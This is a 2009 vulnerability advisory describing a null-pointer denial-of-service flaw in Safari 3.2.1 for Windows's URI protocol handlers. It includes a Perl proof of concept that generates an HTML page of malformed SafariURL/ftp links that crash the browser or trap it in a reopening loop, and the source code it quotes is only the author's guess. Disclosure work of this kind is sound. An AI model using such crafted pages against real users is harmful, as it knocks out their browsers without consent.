##############################################
Safari 3.2.1 for windows safariUrl protocol Handler abusse(null Deference)
Vendor:http://www.apple.com
original advisore:http://lostmon.blogspot.com/2009/01/
safari-321-for-windows-safariurl.html
vendor notify:YES Exploit available: Private
##############################################

This article is a "second" part of :
http://lostmon.blogspot.com/2009/01/safari-for-windows-321-remote-http-uri.html

Safari for windows in prone vulnerable to a null pointer deference
in protocols handlers http, ftp and SafariURL.

The issue is triggered when a user in click a specially crafted link
with malformed uri that causess a NULL pointer derefence safari,
and will result in loss of availability for the browser.

In the case of SafariURL is very curious, because we can compose
a malformed url like SafariIRL://http://../ or ftp://../ and wen
try to open it whith safari,safari opens a new windows , and wen
we try to close this new one,clicking in the 'X' the window is
closed, but it reopens again ...

sO why it opens again in a infinite loop?
Take a look of posible source code of the fucnction.
in any place of the code before using a pointer,
it check that it is not equal to NULL:

######################
Part of code affected
######################

CFURLRef safariURL = nil;
OSStatus err = LSFindApplicationForInfo(kLSUnknownCreator,
CFSTR("com.apple.Safari"), nil, nil, &safariURL);if (err != noErr)
displayErrorAndQuit(@"Unable to locate Safari", @"Nightly builds of WebKit
require Safari to run. Please check that it is available and then try
again.");
NSBundle *safariBundle = [NSBundle bundleWithPath:[(NSURL *)safariURL
path]];
CFRelease(safariURL);
return safariBundle; }

###############################

Simple PoC


################################################
# !/usr/bin/perl
# Safari_httpDoSPoc.pl
# Safari for Windows 3.2.1 Remote http: uri handler DoS
# Lostmon [Lostmon@gmail.com ]
#[http://lostmon.blogspot.com]


$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Uso: $0 <archivo.html>\n";

}

$cabecera = "<html><Title> Safari 3.2.1 for windows Browser Die PoC By
Lostmon</title>
<body>" . "\n";
$codigo = "<h3>Safari 3.2.1 for windows Browser Die PoC By Lostmon <br>(
lostmon@gmail.com) http://lostmon.blogspot.com</h3>
<P>This PoC is a malformed http ,safariurl and ftp URI, this causes that
safari for windows<br>
turn inestable and unresponsive.<br>
Click THIS link.=></p><a href=\"SafariURL://http://../\">Safari Die()</a> or
this other =><a href=\SafariURL://"http://./\">Safari Die()</a>
<br>
=></p><a href=\"SafariURL://ftp://../\">Safari Die()</a> or this other =><a
href=\SafariURL://"ftp://./\">Safari Die()</a>
";
$piepag = "</body></html>";

$datos = $cabecera . $codigo . $piepag;

open(FILE, '>' . $archivo);
print FILE $datos;
close(FILE);

exit;

############################################



I donīt know if it has remote code execution, or other
i make SEVERAL test and only can cause a DoS ,
i donīt know if we can change NSBundle...

Thnx To estrella to be my ligth
Thnx to all Lostmon Team.

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....